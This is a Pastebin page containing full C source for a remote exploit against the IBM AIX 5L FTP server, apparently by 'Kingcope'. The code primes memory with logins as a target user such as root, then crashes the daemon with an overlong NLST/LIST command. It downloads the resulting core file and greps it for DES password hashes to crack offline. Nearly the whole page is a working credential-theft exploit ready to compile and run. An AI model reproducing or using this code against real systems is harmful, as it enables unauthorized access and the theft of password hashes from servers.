API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 6th, 2017
127
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.87 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. * IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
  3. *
  4. * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
  5. *
  6. * bug found & exploited by Kingcope
  7. *
  8. * Version 2.0 - July 2010
  9. * ----------------------------------------------------------------------------
  10. * Description: -
  11. * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
  12. * For example: NLST ~AAAAA...A (2000 AŽs should be enough) -
  13. * The fun part here is that it creates a coredump file in the current -
  14. * directory if it is set writable by the logged in user. -
  15. * The goal of the exploit is to get the DES encrypted user hashes -
  16. * off the server. These can be later cracked with JtR. -
  17. * This is accomplished by populating the memory with logins of the user -
  18. * we would like the encrypted hash from. Logging in three times with the -
  19. * target username should be enough so that the DES hash is included in the -
  20. * 'core' file. -
  21. * The FTPd banner looks like below. -
  22. * 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready. -
  23. * 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. -
  24. * ----------------------------------------------------------------------------
  25. */
  26.  
  27. #include <stdio.h>
  28. #include <stdlib.h>
  29. #include <string.h>
  30. #include <unistd.h>
  31. #include <sys/types.h>
  32. #include <sys/socket.h>
  33. #include <netdb.h>
  34. #include <fcntl.h>
  35.  
  36. int createconnection(char *target, char *targetport);
  37. void getline(int s);
  38. void putline(int s, char *out);
  39. void usage(char *exe);
  40.  
  41. char in[8096];
  42. char out[8096];
  43.  
  44. int main(int argc, char *argv[])
  45. {
  46. extern int optind;
  47. extern char *optarg;
  48. int haveuser=0,havepassword=0;
  49. int s,s2,nsock;
  50. int c,k,len;
  51. int fd;
  52.  
  53. char *target = NULL;
  54. char *username = "ftp";
  55. char *password = "guest";
  56. char *writeto = "pub";
  57. char *crackme = "root";
  58. char *targetport = "21";
  59. int uselist = 0;
  60. char *myip = NULL;
  61. char *as = NULL;
  62. int octet_in[4], port;
  63. struct sockaddr_in yo, cli;
  64. char *oct = NULL;
  65.  
  66. while ((c = getopt(argc, argv, "h:i:p:l:k:d:c:s")) != EOF) {
  67. switch(c) {
  68. case 'h':
  69. target = (char*)malloc(strlen(optarg)+1);
  70. strcpy(target, optarg);
  71. break;
  72. case 'i':
  73. myip = (char*)malloc(strlen(optarg)+1);
  74. strcpy(myip, optarg);
  75. break;
  76. case 'p':
  77. targetport = (char*)malloc(strlen(optarg)+1);
  78. strcpy(targetport, optarg);
  79. break;
  80. case 'l':
  81. username = (char*)malloc(strlen(optarg)+1);
  82. strcpy(username, optarg);
  83. haveuser = 1;
  84. break;
  85. case 'k':
  86. password = (char*)malloc(strlen(optarg)+1);
  87. strcpy(password, optarg);
  88. havepassword = 1;
  89. break;
  90. case 'd':
  91. writeto = (char*)malloc(strlen(optarg)+1);
  92. strcpy(writeto, optarg);
  93. break;
  94. case 'c':
  95. crackme = (char*)malloc(strlen(optarg)+1);
  96. strcpy(crackme, optarg);
  97. break;
  98. case 's':
  99. uselist = 1;
  100. break;
  101. default:
  102. usage(argv[0]);
  103. }
  104. }
  105.  
  106. if (target == NULL || myip == NULL)
  107. usage(argv[0]);
  108.  
  109. if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
  110. usage(argv[0]);
  111. }
  112.  
  113. s = createconnection(target, targetport);
  114. getline(s);
  115.  
  116. fprintf(stderr, "populating DES hash in memory...\n");
  117.  
  118. for (k=0;k<3;k++) {
  119. snprintf(out, sizeof out, "USER %s\r\n", crackme);
  120. putline(s, out);
  121. getline(s);
  122. snprintf(out, sizeof out, "PASS abcdef\r\n");
  123. putline(s,out);
  124. getline(s);
  125. }
  126.  
  127. fprintf(stderr, "logging in...\n");
  128.  
  129. snprintf(out, sizeof out, "USER %s\r\n", username);
  130. putline(s, out);
  131. getline(s);
  132. snprintf(out, sizeof out, "PASS %s\r\n", password);
  133. putline(s,out);
  134. getline(s);
  135. getline(s);
  136.  
  137. fprintf(stderr, "changing directory...\n");
  138.  
  139. snprintf(out, sizeof out, "CWD %s\r\n", writeto);
  140. putline(s, out);
  141. getline(s);
  142.  
  143. fprintf(stderr, "triggering segmentation violation...\n");
  144.  
  145. as = (char*)malloc(2000);
  146. memset(as, 'A', 2000);
  147. as[2000-1]=0;
  148.  
  149. if (!uselist) {
  150. snprintf(out, sizeof out, "NLST ~%s\r\n", as);
  151. } else {
  152. /* AIX 5.3 trigger - thanks to karol */
  153. snprintf(out, sizeof out, "LIST ~%s\r\n", as);
  154. }
  155. putline(s, out);
  156.  
  157. memset(in, '\0', sizeof in);
  158. if (recv(s, in, sizeof in, 0) < 1) {
  159. printf("trigger succeeded!\nwaiting for core file to be created...\n");
  160. } else {
  161. printf("trigger seems to have failed, proceeding anyways...\n"
  162. "\nwaiting for core file to be created...\n");
  163. }
  164.  
  165. sleep(5);
  166.  
  167. close(s);
  168.  
  169. s = createconnection(target, targetport);
  170. getline(s);
  171.  
  172. fprintf(stderr, "logging in 2nd time...\n");
  173.  
  174. snprintf(out, sizeof out, "USER %s\r\n", username);
  175. putline(s, out);
  176. getline(s);
  177. snprintf(out, sizeof out, "PASS %s\r\n", password);
  178. putline(s,out);
  179. getline(s);
  180. getline(s);
  181.  
  182. fprintf(stderr, "changing directory...\n");
  183.  
  184. snprintf(out, sizeof out, "CWD %s\r\n", writeto);
  185. putline(s, out);
  186. getline(s);
  187.  
  188. fprintf(stderr, "getting core file...\n");
  189.  
  190. snprintf(out, sizeof out, "TYPE I\r\n");
  191. putline(s, out);
  192. getline(s);
  193.  
  194. port = getpid() + 1024;
  195. len = sizeof(cli);
  196.  
  197. bzero(&yo, sizeof(yo));
  198. yo.sin_family = AF_INET;
  199. yo.sin_port=htons(port);
  200. yo.sin_addr.s_addr = htonl(INADDR_ANY);
  201.  
  202. oct=(char *)strtok(myip,".");
  203. octet_in[0]=atoi(oct);
  204. oct=(char *)strtok(NULL,".");
  205. octet_in[1]=atoi(oct);
  206. oct=(char *)strtok(NULL,".");
  207. octet_in[2]=atoi(oct);
  208. oct=(char *)strtok(NULL,".");
  209. octet_in[3]=atoi(oct);
  210.  
  211. snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
  212. putline(s, out);
  213. getline(s);
  214.  
  215. if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  216. perror("socket");
  217. return -1;
  218. }
  219.  
  220. if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
  221. perror("bind");
  222. close(s2);
  223. exit(1);
  224. }
  225.  
  226. if (listen(s2, 10) < 0) {
  227. perror("listen");
  228. close(s2);
  229. exit(1);
  230. }
  231.  
  232. snprintf(out, sizeof out, "RETR core\r\n");
  233. putline(s, out);
  234. getline(s);
  235. if (strstr(in, "150") == NULL) {
  236. fprintf(stderr, "core file not found... terminating.\n");
  237. close(s);
  238. exit(1);
  239. }
  240.  
  241. fd = open("core", O_WRONLY | O_CREAT);
  242. if (fd == -1) {
  243. perror("open on local core file");
  244. close(s);
  245. exit(1);
  246. }
  247.  
  248. sleep(1);
  249.  
  250. if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
  251. perror("accept");
  252. close(s);
  253. exit(1);
  254. }
  255.  
  256. do {
  257. k = recv(nsock, in, sizeof in, 0);
  258. if (k < 1) break;
  259. write(fd, in, k);
  260. } while (k > 0);
  261.  
  262. close(nsock);
  263. close(fd);
  264. close(s);
  265.  
  266. fprintf(stderr, "finally extracting DES hashes from core file for user '%s'...\n", crackme);
  267. system("strings core | grep '^[A-Za-z0-9]\\{13\\}$'");
  268.  
  269. fprintf(stderr, "done.\n");
  270. return 0;
  271. }
  272.  
  273. int createconnection(char *target, char *targetport) {
  274. struct addrinfo hints, *res;
  275. int s;
  276.  
  277. memset(&hints, 0, sizeof hints);
  278. hints.ai_family = AF_UNSPEC;
  279. hints.ai_socktype = SOCK_STREAM;
  280.  
  281. if (getaddrinfo(target, targetport, &hints, &res)) {
  282. perror("getaddrinfo");
  283. exit(1);
  284. }
  285.  
  286. s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
  287. if (s < 0) {
  288. perror("socket");
  289. exit(1);
  290. }
  291.  
  292. if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
  293. perror("connect");
  294. exit(1);
  295. }
  296.  
  297. return s;
  298. }
  299.  
  300. void getline(int s)
  301. {
  302. memset(in, '\0', sizeof in);
  303. if (recv(s, in, sizeof in, 0) < 1) {
  304. perror("recv");
  305. close(s);
  306. exit(1);
  307. }
  308.  
  309. fprintf(stderr, "<\t%s", in);
  310. }
  311.  
  312. void putline(int s, char *out) {
  313. fprintf(stderr, ">\t%s", out);
  314.  
  315. if (send(s, out, strlen(out), 0) == -1) {
  316. perror("send");
  317. close(s);
  318. exit(1);
  319. }
  320. }
  321.  
  322. void usage(char *exe)
  323. {
  324. fprintf(stderr, "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]"
  325. " [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n",
  326. exe);
  327. exit(0);
  328. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!